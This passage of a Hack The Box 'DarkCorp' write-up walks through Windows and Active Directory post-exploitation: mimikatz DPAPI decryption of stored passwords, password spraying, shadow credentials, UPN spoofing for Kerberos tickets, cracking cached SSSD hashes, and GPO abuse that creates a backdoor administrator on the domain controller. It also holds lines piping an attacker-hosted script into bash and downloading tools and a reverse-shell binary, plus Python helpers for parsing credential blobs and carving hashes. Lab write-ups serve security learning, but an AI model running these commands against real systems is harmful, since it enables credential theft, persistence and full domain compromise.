old/hex : 01 00 00 00 ba ea 4e 2a 46 12 e4 68 8c 1a 63 7a 35 3c 4c 66 3c 9e d9 d8 c9 8f 86 a0 a5 40 63 50 db 3e aa c1 52 58 de db 19 b6 2f 7f
    full: baea4e2a4612e4688c1a637a353c4c663c9ed9d8c98f86a0a5406350db3eaac15258dedb19b62f7f
    m/u : baea4e2a4612e4688c1a637a353c4c663c9ed9d8 / c98f86a0a5406350db3eaac15258dedb19b62f7f

Secret  : NL$KM
cur/hex : dd c9 21 14 b9 23 69 1b d8 be fd 57 6b 3c 3e e1 9d 3d 3f 74 82 af 75 33 fd 74 61 6e b7 24 55 af 6f 61 a0 bc 2b 2a 86 cf 6e ec e0 d3 37 98 fe e5 14 54 7d a9 a6 45 19 37 f1 20 24 4b 18 43 19 72
old/hex : dd c9 21 14 b9 23 69 1b d8 be fd 57 6b 3c 3e e1 9d 3d 3f 74 82 af 75 33 fd 74 61 6e b7 24 55 af 6f 61 a0 bc 2b 2a 86 cf 6e ec e0 d3 37 98 fe e5 14 54 7d a9 a6 45 19 37 f1 20 24 4b 18 43 19 72
*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\b9f97cf8-ab4f-432b-90be-ec2c1313cf01 /system:1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472" "exit"
...
[masterkey] with DPAPI_SYSTEM (machine, then user): 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
** USER **
  key : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
  sha1: 053cd32f9169e99ffcca5cc495695762851cd85a

Now that we have the SYSTEM user master key, find the credential blobs it protects and decrypt them. Each Credentials directory holds the DPAPI blobs of its profile; the one under systemprofile is the interesting target:

*Evil-WinRM* PS C:\Users\Administrator\Music> ls -path / -rec -dir -filter Credentials -erroraction silent -force | %{$_.FullName}
C:\Users\Administrator\AppData\Local\Microsoft\Credentials
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials
C:\Users\Administrator\Documents\credentials
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\Administrator\Music> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials -force |%{$_.FullName}
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\25EE02BE85D0F32011CE03B1B0D2FB47
*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\25EE02BE85D0F32011CE03B1B0D2FB47 /masterkey:f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635" "exit"
...
Decrypting Credential:
 * masterkey     : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 0000011e - 286
  credUnk0       : 00004004 - 16388

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 1/20/2025 10:01:28 PM
  unkFlagsOrSize : 00000020 - 32
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6}
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : WEB-01\Administrator
  CredentialBlob : But_Lying_Aid9!
  Attributes     : 0
...
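
What dpapi::cred printed above is the decrypted CREDENTIAL structure. The parser below is an added example (not mimikatz's or the page's code) that walks that layout in pure Python: a 12-byte header (credFlags, credSize, credUnk0), the fixed fields, five length-prefixed UTF-16LE strings and the CredentialBlob. The sizes are a useful sanity check: rebuilding the values shown above as a blob gives credSize 286, the value mimikatz reported, so the layout is consistent with the output. The sample values come from the output above; build_credential() exists only to produce test input and is not a tool for writing real credential files.

```python
import struct
from datetime import datetime, timedelta, timezone

# Added example: parser for the *decrypted* CREDENTIAL blob that dpapi::cred
# prints. Layout (little-endian): 12-byte header (credFlags, credSize, credUnk0),
# Type, Flags, LastWritten (FILETIME), unkFlagsOrSize, Persist, AttributeCount,
# unk0, unk1, then length-prefixed UTF-16LE strings (length in bytes, NUL
# terminator included) for TargetName, UnkData, Comment, TargetAlias, UserName,
# then the length-prefixed CredentialBlob, then attributes (left raw here).
CRED_TYPES = {1: "generic", 2: "domain_password", 3: "domain_certificate",
              4: "domain_visible_password"}
PERSIST = {1: "session", 2: "local_machine", 3: "enterprise"}
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
_FIXED = "<IIQIIIII"          # fields after the header, 36 bytes


def _filetime_to_dt(ft: int) -> datetime:
    """FILETIME = 100 ns ticks since 1601-01-01 UTC."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def _dt_to_filetime(dt: datetime) -> int:
    td = dt - _EPOCH_1601           # integer arithmetic, no float rounding
    return (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10


def _take_str(buf: bytes, off: int):
    (n,) = struct.unpack_from("<I", buf, off)
    raw = buf[off + 4:off + 4 + n]
    if len(raw) != n or n % 2:
        raise ValueError("truncated or odd-length UTF-16 string")
    return raw.decode("utf-16-le").rstrip("\x00") or None, off + 4 + n


def _put_str(s):
    if s is None:                   # mimikatz shows these as (null)
        return struct.pack("<I", 0)
    raw = (s + "\x00").encode("utf-16-le")
    return struct.pack("<I", len(raw)) + raw


def parse_credential(buf: bytes) -> dict:
    """Decode a decrypted CREDENTIAL blob into the fields dpapi::cred prints."""
    flags, size, unk0 = struct.unpack_from("<III", buf, 0)
    if size != len(buf):
        raise ValueError(f"credSize {size} does not match blob length {len(buf)}")
    ctype, cflags, ft, unk_fs, persist, attr_count, _, _ = struct.unpack_from(_FIXED, buf, 12)
    cred = {"credFlags": flags, "credSize": size, "credUnk0": unk0,
            "Type": CRED_TYPES.get(ctype, ctype), "Flags": cflags,
            "LastWritten": _filetime_to_dt(ft), "unkFlagsOrSize": unk_fs,
            "Persist": PERSIST.get(persist, persist), "AttributeCount": attr_count}
    off = 12 + struct.calcsize(_FIXED)
    for field in ("TargetName", "UnkData", "Comment", "TargetAlias", "UserName"):
        cred[field], off = _take_str(buf, off)
    (blen,) = struct.unpack_from("<I", buf, off)
    blob = buf[off + 4:off + 4 + blen]
    if len(blob) != blen:
        raise ValueError("truncated CredentialBlob")
    # domain_password blobs hold the UTF-16LE password; anything else is shown as hex
    try:
        cred["CredentialBlob"] = blob.decode("utf-16-le") if blen % 2 == 0 else blob.hex()
    except UnicodeDecodeError:
        cred["CredentialBlob"] = blob.hex()
    cred["Attributes"] = buf[off + 4 + blen:]
    return cred


def build_credential(target, user, secret, when, ctype=2, persist=2,
                     cred_flags=0x30, cred_unk0=0x4004, unk_fs=0x20) -> bytes:
    """Assemble a blob in the same layout; only used here to produce test input."""
    body = struct.pack(_FIXED, ctype, 0, _dt_to_filetime(when), unk_fs, persist, 0, 0, 0)
    body += _put_str(target) + _put_str(None) + _put_str(None) + _put_str(None) + _put_str(user)
    blob = secret.encode("utf-16-le")
    body += struct.pack("<I", len(blob)) + blob
    return struct.pack("<III", cred_flags, 12 + len(body), cred_unk0) + body


def page_example() -> bytes:
    """Constructed blob carrying the values mimikatz printed above (sample data)."""
    when = datetime(2025, 1, 20, 22, 1, 28, tzinfo=timezone.utc)
    return build_credential(
        "Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6}",
        "WEB-01\\Administrator", "But_Lying_Aid9!", when)


if __name__ == "__main__":
    for k, v in parse_credential(page_example()).items():
        print(f"{k:>16}: {v}")
```

The TargetName prefix Domain:batch=TaskScheduler:Task: is why this blob exists at all: a scheduled task configured to run as a stored account keeps that account's password in the profile's Credential Manager, protected only by DPAPI, which is exactly what was unwrapped above with the SYSTEM master key.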

Admin Blobs

The same can be done for the Administrator's own blobs. Those master keys are protected by the account password rather than by DPAPI_SYSTEM, and we now have it (But_Lying_Aid9!, the Task Scheduler credential above), so dpapi::masterkey /password: decrypts them; mimikatz also unwraps the local backup key with DPAPI_SYSTEM as a second route:

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::masterkey /in:C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500\6037d071-cac5-481e-9e08-c4296c0a7ff7 /system:1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472 /password:But_Lying_Aid9!" "exit"
...
Auto SID from path seems to be: S-1-5-21-2988385993-1727309239-2541228647-500

[masterkey] with password: But_Lying_Aid9! (normal user)
  key : ac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
  sha1: 6e08761666a9819671bbc5bbacfb4671964367b7

[backupkey] with DPAPI_SYSTEM: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
  key : 114ce98533e2d1410e1a0b8c8727efe0e9ec312961e5dc9b12ada8cf8986cf71
  sha1: 4832b578a09baa9e7f8858a4242da25c0915aa9b
...
*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:ac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da" "exit"
...
  UserName       : Administrator
  CredentialBlob : Pack_Beneath_Solid9!
...

john.w pwned

Spray both recovered passwords against the DC over the pivot. The one from the Administrator's credential blob is reused by the domain user john.w:

└─$ proxychains -q netexec smb 172.16.20.1 -u users.txt -p 'But_Lying_Aid9!' --continue-on-success
...
└─$ proxychains -q netexec smb 172.16.20.1 -u users.txt -p 'Pack_Beneath_Solid9!' --continue-on-success
...
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!
...

Privilege Escalation (angela.w)

Writeup-25.png

We could reset the user's password, but since this is a shared HTB box that's not a good idea. Instead we can use the shadow credentials attack (write a key credential to msDS-KeyCredentialLink, authenticate with the resulting certificate via PKINIT and recover the NT hash), which leaves the password untouched; certipy restores the original attribute afterwards.

└─$ proxychains -q certipy-ad shadow auto -u 'john.w@darkcorp.htb' -p 'Pack_Beneath_Solid9!' -account angela.w -target darkcorp.htb -dc-ip 172.16.20.1
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'angela.w'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '262b09d0-c462-8f5d-854b-983100771fb1'
[*] Adding Key Credential with device ID '262b09d0-c462-8f5d-854b-983100771fb1' to the Key Credentials for 'angela.w'
[*] Successfully added Key Credential with device ID '262b09d0-c462-8f5d-854b-983100771fb1' to the Key Credentials for 'angela.w'
[*] Authenticating as 'angela.w' with the certificate
[*] Using principal: angela.w@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'angela.w.ccache'
[*] Trying to retrieve NT hash for 'angela.w'
[*] Restoring the old Key Credentials for 'angela.w'
[*] Successfully restored the old Key Credentials for 'angela.w'
[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a

Update bloodhound

└─$ proxychains -q bloodhound-python -u 'angela.w' --hashes ':957246c8137069bca672dc6aa0af7c7a' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op angela.w

Nothing new...

Angela has a second account with the .adm suffix, indicating higher privileges, but the same credentials don't work for it.

Writeup-26.png

Privilege Escalation (angela.w.adm)

sAMAccountName spoofing

The Hacker Recipes: sAMAccountName spoofing - User account
DEF CON 31 - A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks - Ceri Coburn
From the talk: "If NT_ENTERPRISE is used as the hint, userPrincipalName is searched first."

john.w's write access over angela.w (the same rights used for the shadow credentials attack above) also covers userPrincipalName. Setting angela.w's UPN to angela.w.adm and then requesting a TGT with the NT_ENTERPRISE name type makes the KDC resolve the name through the UPN first, so angela.w's NT hash is accepted and the ticket is issued with the client name angela.w.adm. The Linux host then maps that principal to its local angela.w.adm account.

https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#set-object

└─$ proxychains -q bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u 'john.w' -p 'Pack_Beneath_Solid9!' set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w userPrincipalName has been updated

└─$ proxychains -q bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u 'john.w' -p 'Pack_Beneath_Solid9!' get object angela.w | grep Name
distinguishedName: CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb
givenName: Angela
sAMAccountName: angela.w
userPrincipalName: angela.w.adm
└─$ proxychains -q impacket-getTGT -dc-ip 'dc-01.darkcorp.htb' 'darkcorp.htb'/'angela.w.adm' -hashes ':957246c8137069bca672dc6aa0af7c7a' -principalType NT_ENTERPRISE
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in angela.w.adm.ccache

└─$ export KRB5CCNAME=$(readlink -f ./angela.w.adm.ccache)
└─$ klist
Ticket cache: FILE:/home/woyag/Desktop/Rooms/DarkCorp/angela.w.adm.ccache
Default principal: angela.w.adm@DARKCORP.HTB

Valid starting       Expires              Service principal
02/16/2025 00:46:55  02/16/2025 10:46:55  krbtgt/DARKCORP.HTB@DARKCORP.HTB
        renew until 02/17/2025 00:46:55
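
To see why the NT_ENTERPRISE hint matters, here is a small added Python model (not from the page or any of the tools it uses) of the KDC's name resolution, run against a constructed two-account directory. The sample assumes the real angela.w.adm has no UPN of its own, which is the condition under which the UPN search lands on angela.w; UPN matching is simplified to the part before the @. The model keeps the pre-auth key bound to the resolved account while the issued ticket carries the requested name, which is what ksu on drip then maps to the angela.w.adm Unix account. upn_collisions() is the audit a defender can run over an LDAP dump to catch such a rewrite.

```python
# Added example (not from the page or the tools it uses): a model of how the
# AD KDC resolves the client name in an AS-REQ depending on the name type, plus
# an audit that flags the UPN/sAMAccountName collision this attack relies on.
# The directory below is constructed sample data; UPN matching is simplified to
# the user part (before '@'), which is enough to show the lookup order.
NT_PRINCIPAL = 1      # name resolved against sAMAccountName
NT_ENTERPRISE = 10    # "user@realm" form; userPrincipalName is searched first


def _user_part(name: str) -> str:
    return name.split("@", 1)[0].lower()


def resolve_client(directory, name, name_type):
    """Return the account whose long-term key the KDC will use for pre-auth."""
    if name_type == NT_ENTERPRISE:
        for acct in directory:
            upn = acct.get("userPrincipalName")
            if upn and _user_part(upn) == _user_part(name):
                return acct
    # NT_PRINCIPAL, or NT_ENTERPRISE with no UPN match: fall back to sAMAccountName
    for acct in directory:
        if acct["sAMAccountName"].lower() == _user_part(name):
            return acct
    return None


def as_request(directory, name, name_type, nt_hash):
    """Model an AS-REQ with RC4 pre-auth: the key comes from the resolved
    account, but the cname in the issued TGT is the name the client asked for."""
    acct = resolve_client(directory, name, name_type)
    if acct is None or acct["ntHash"] != nt_hash:
        return None                      # KDC_ERR_C_PRINCIPAL_UNKNOWN / PREAUTH_FAILED
    return {"cname": _user_part(name), "key_owner": acct["sAMAccountName"]}


def upn_collisions(directory):
    """Audit check: UPNs whose user part is another account's sAMAccountName."""
    by_sam = {a["sAMAccountName"].lower(): a for a in directory}
    hits = []
    for a in directory:
        upn = a.get("userPrincipalName")
        other = by_sam.get(_user_part(upn)) if upn else None
        if other is not None and other is not a:
            hits.append((a["sAMAccountName"], other["sAMAccountName"]))
    return hits


def demo():
    """Replay the attack above against the sample directory."""
    angela_hash = "957246c8137069bca672dc6aa0af7c7a"   # NT hash recovered above
    directory = [
        {"sAMAccountName": "angela.w", "userPrincipalName": "angela.w@darkcorp.htb",
         "ntHash": angela_hash},
        # the privileged account: the sample assumes it has no UPN of its own,
        # and its hash is a placeholder we do not know
        {"sAMAccountName": "angela.w.adm", "userPrincipalName": None,
         "ntHash": "0123456789abcdef0123456789abcdef"},
    ]
    before = as_request(directory, "angela.w.adm@darkcorp.htb", NT_ENTERPRISE, angela_hash)
    directory[0]["userPrincipalName"] = "angela.w.adm"   # what bloodyAD set above
    after = as_request(directory, "angela.w.adm@darkcorp.htb", NT_ENTERPRISE, angela_hash)
    plain = as_request(directory, "angela.w.adm", NT_PRINCIPAL, angela_hash)
    return {"before": before, "after": after, "nt_principal": plain,
            "collisions": upn_collisions(directory)}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:>12}: {v}")
```

With the default NT_PRINCIPAL type the request still resolves to the real angela.w.adm and fails pre-auth, which is why -principalType NT_ENTERPRISE is required above. On the defensive side a userPrincipalName rewrite is a Directory Service event 5136 on the DC when object auditing is enabled, and the collision check is cheap to run over a BloodHound or ldapdomaindump export.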

Remote Kerberos authentication via SSH was tricky; the -k or -K flags didn't want to work...

Linux (Root)

We can use ksu locally instead: copy the ccache to the box and switch user with it.

└─$ sshpass -p 'ThePlague61780' scp ./angela.w.adm.ccache ebelford@drip.htb:/tmp/root.ccache
ebelford@drip:/tmp$ KRB5CCNAME=/tmp/root.ccache ksu angela.w.adm
Authenticated angela.w.adm@DARKCORP.HTB
Account angela.w.adm: authorization for angela.w.adm@DARKCORP.HTB successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/tmp$ id
uid=1730401107(angela.w.adm) gid=1730400513(domain users) groups=1730400513(domain users),1730401109(linux_admins)
angela.w.adm@drip:/tmp$ sudo -l
Matching Defaults entries for angela.w.adm on drip:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User angela.w.adm may run the following commands on drip:
    (ALL : ALL) NOPASSWD: ALL

Privilege Escalation (taylor.b.adm)

angela.w.adm@drip:/tmp$ sudo su
root@drip:~# curl 10.10.14.130/lp.sh|bash|tee lp.log
Writeup-27.png
Writeup-28.png

SSSD (System Security Services Daemon)

https://github.com/ricardojoserf/SSSD-creds

root@drip:~# tar -czvf ldb.tgz /var/lib/sss/db/*.ldb
root@drip:~# install -m444 ldb.tgz /tmp                                                                  
└─$ sshpass -p 'ThePlague61780' scp ebelford@drip.htb:/tmp/ldb.tgz .
└─$ tar -xvzf ldb.tgz
└─$ curl -LOs https://raw.githubusercontent.com/ricardojoserf/SSSD-creds/refs/heads/main/analyze.sh
└─$ chmod +x analyze.sh
└─$ ./analyze.sh ./var/lib/sss/db
### 2 hash found in ./var/lib/sss/db/cache_darkcorp.htb.ldb ###
Account:        taylor.b.adm@darkcorp.htb
Hash:           $6$grFlZFmVmihASKFH$eGztifERI7QdAtpkClRdZOkbNAoPQzVWEiy4VqAQBUiSpCpm3cXKlajEalTLm9wz.qq77zMkemWIWUXo.wQmk0

Account:        victor.r@darkcorp.htb
Hash:           $6$hQ95QZ32eYKto9gy$7uXvPC4xhOZyuuLUsHyhh8Nths.EP1wPlMbr0AXPXrlxJ26lnOFBJG6ekSovGjufJSokA/KRoHGmQwXbr437k0
  =====> Adding ./var/lib/sss/db/cache_darkcorp.htb.ldb hashes to hashes.txt <=====
### 0 hash found in ./var/lib/sss/db/config.ldb ###
### 0 hash found in ./var/lib/sss/db/sssd.ldb ###
### 0 hash found in ./var/lib/sss/db/timestamps_darkcorp.htb.ldb ###

Great, our target was taylor.b.adm and we can probably crack the hash.

➜ .\hashcat.exe -a 0  .\hashes.txt .\rockyou.txt
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
➜ .\hashcat.exe -a 0  -m 1800 .\hashes.txt .\rockyou.txt
$6$grFlZFmVmihASKFH$eGztifERI7QdAtpkClRdZOkbNAoPQzVWEiy4VqAQBUiSpCpm3cXKlajEalTLm9wz.qq77zMkemWIWUXo.wQmk0:!QAZzaq1
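
analyze.sh is essentially a string carve over the ldb files. The added Python below (not analyze.sh; the SAMPLE bytes are constructed to mimic the record layout and are not the real cache, though the two hashes are the ones printed above) does the same job offline: it pulls every sha512crypt hash out of the dump, attributes each to the name= entry preceding it, and emits user:hash lines for hashcat -m 1800 --username. On the defensive side the fix is to stop SSSD caching credentials (cache_credentials = false in the domain section of sssd.conf) or to keep root on such hosts out of reach, since the cache is only readable by root.

```python
import re

# Added example (not analyze.sh): carve cached sha512crypt hashes out of an SSSD
# cache_<domain>.ldb dump and pair each with the account record it sits in. The
# SAMPLE bytes are constructed to mimic the record layout (attribute names
# followed by values); they are not the real cache file.
HASH_RE = re.compile(rb"\$6\$(?:rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}")
NAME_RE = re.compile(rb"(?<![A-Za-z])name[^A-Za-z0-9@]{1,8}([A-Za-z0-9._-]+@[A-Za-z0-9._-]+)")

SAMPLE = (
    b"DN=NAME=TAYLOR.B.ADM@DARKCORP.HTB,CN=USERS,CN=DARKCORP.HTB,CN=SYSDB\x00"
    b"name\x00taylor.b.adm@darkcorp.htb\x00objectClass\x00user\x00"
    b"cachedPassword\x00$6$grFlZFmVmihASKFH$eGztifERI7QdAtpkClRdZOkbNAoPQzVWEiy4VqAQBUiSpCpm3cXKlajEalTLm9wz.qq77zMkemWIWUXo.wQmk0\x00"
    b"DN=NAME=VICTOR.R@DARKCORP.HTB,CN=USERS,CN=DARKCORP.HTB,CN=SYSDB\x00"
    b"name\x00victor.r@darkcorp.htb\x00objectClass\x00user\x00"
    b"cachedPassword\x00$6$hQ95QZ32eYKto9gy$7uXvPC4xhOZyuuLUsHyhh8Nths.EP1wPlMbr0AXPXrlxJ26lnOFBJG6ekSovGjufJSokA/KRoHGmQwXbr437k0\x00"
    # a user that logged in but has no cached hash (constructed name)
    b"DN=NAME=SAMPLE.USER@DARKCORP.HTB,CN=USERS,CN=DARKCORP.HTB,CN=SYSDB\x00"
    b"name\x00sample.user@darkcorp.htb\x00objectClass\x00user\x00"
)


def carve_cached_creds(blob):
    """Return [(account, hash)] pairing each hash with the last name= seen before it."""
    names = [(m.start(), m.group(1).decode()) for m in NAME_RE.finditer(blob)]
    found = []
    for h in HASH_RE.finditer(blob):
        owner = None
        for pos, name in names:
            if pos > h.start():
                break
            owner = name
        found.append((owner, h.group(0).decode()))
    return found


def hashcat_lines(creds):
    """user:hash lines for `hashcat -m 1800 --username`; unattributed hashes are skipped."""
    return ["%s:%s" % (u, h) for u, h in creds if u]


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print("\n".join(hashcat_lines(carve_cached_creds(data))))
```

Run it against a copied cache_darkcorp.htb.ldb to get the same two lines analyze.sh produced; the name-before-hash pairing is the part analyze.sh leaves to the reader when several records sit in one file.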

Privilege Escalation (DC Administrator)

└─$ proxychains -q evil-winrm -i 172.16.20.1 -u 'taylor.b.adm' -p '!QAZzaq1'
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> whoami /all
User Name             SID
===================== ===============================================
darkcorp\taylor.b.adm S-1-5-21-3432610366-2163336488-3604236847-14101

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
darkcorp\linux_admins                       Group            S-1-5-21-3432610366-2163336488-3604236847-1109 Mandatory group, Enabled by default, Enabled group
darkcorp\gpo_manager                        Group            S-1-5-21-3432610366-2163336488-3604236847-1110 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Update bloodhound

└─$ proxychains -q bloodhound-python -u 'taylor.b.adm' -p '!QAZzaq1' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op taylor.b.adm

GPO Abuse

taylor.b.adm is a member of gpo_manager (see whoami /all above), the group with write access over the SecurityUpdates GPO; since that policy applies to the DC, a scheduled task pushed through it runs there as SYSTEM.

Writeup-29.png
Writeup-30.png
Writeup-31.png

SharpGPOAbuse gets deleted as soon as it's uploaded; AV is on.

*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> curl.exe 10.10.14.130/SharpGPOAbuse.exe -o sa.exe
*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> ls -force

https://www.thehacker.recipes/ad/movement/group-policies
https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse

└─$ git clone -q https://github.com/X-C3LL/GPOwned.git
└─$ git clone -q https://github.com/Hackndo/pyGPOAbuse.git

https://github.com/gwillgues/Reverse-Shells.git

*Evil-WinRM* PS C:\Users\taylor.b.adm\Music> curl.exe 10.10.14.130/rev.exe -O

Note: never mind this binary; GPOwned failed to execute it, so it was useless.

└─$ proxychains -q python ./GPOwned/GPOwned.py -u 'taylor.b.adm' -p '!QAZzaq1' -d 'darkcorp.htb' -dc-ip '172.16.20.1' -gpcmachine -listgpo
                GPO Helper - @TheXC3LL
                Modifications by - @Fabrizzio53


[*] Connecting to LDAP service at 172.16.20.1
[*] Requesting GPOs info from LDAP

[+] Name: {31B2F340-016D-11D2-945F-00C04FB984F9}
        [-] displayName: Default Domain Policy
        [-] gPCFileSysPath: \\darkcorp.htb\sysvol\darkcorp.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
        [-] gPCMachineExtensionNames: [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
        [-] versionNumber: 3
        [-] Verbose:
                ---             ---
                Registry Settings
                EFS Policy
                ---             ---
                Security
                Computer Restricted Groups
                ---             ---
                EFS Recovery
                EFS Policy

[+] Name: {6AC1786C-016F-11D2-945F-00C04fB984F9}
        [-] displayName: Default Domain Controllers Policy
        [-] gPCFileSysPath: \\darkcorp.htb\sysvol\darkcorp.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
        [-] gPCMachineExtensionNames: [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{B05566AC-FE9C-4368-BE01-7A4CBB6CBA11}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{F3CCC681-B74C-4060-9F26-CD84525DCA2A}{0F3F3735-573D-9804-99E4-AB2A69BA5FD4}]
        [-] versionNumber: 35
        [-] Verbose:
                ---             ---
                Registry Settings
                Windows Firewall
                ---             ---
                Security
                Computer Restricted Groups
                ---             ---
                Audit Policy Configuration
                Computer Policy Setting

[+] Name: {652CAE9A-4BB7-49F2-9E52-3361F33CE786}
        [-] displayName: SecurityUpdates
        [-] gPCFileSysPath: \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}
        [-] gPCMachineExtensionNames: None
        [-] versionNumber: 0
        [-] Verbose:

[^] Have a nice day!
└─$ proxychains -q python ./pyGPOAbuse/pygpoabuse.py 'darkcorp.htb'/'taylor.b.adm':'!QAZzaq1' -gpo-id '652CAE9A-4BB7-49F2-9E52-3361F33CE786' -command 'net user letmein Password123$ /add && net localgroup administrators letmein /add && net localgroup "Remote Management Users" letmein /add' -f -v
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask TASK_1b9c4181 created!
[+] ScheduledTask TASK_1b9c4181 created!
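
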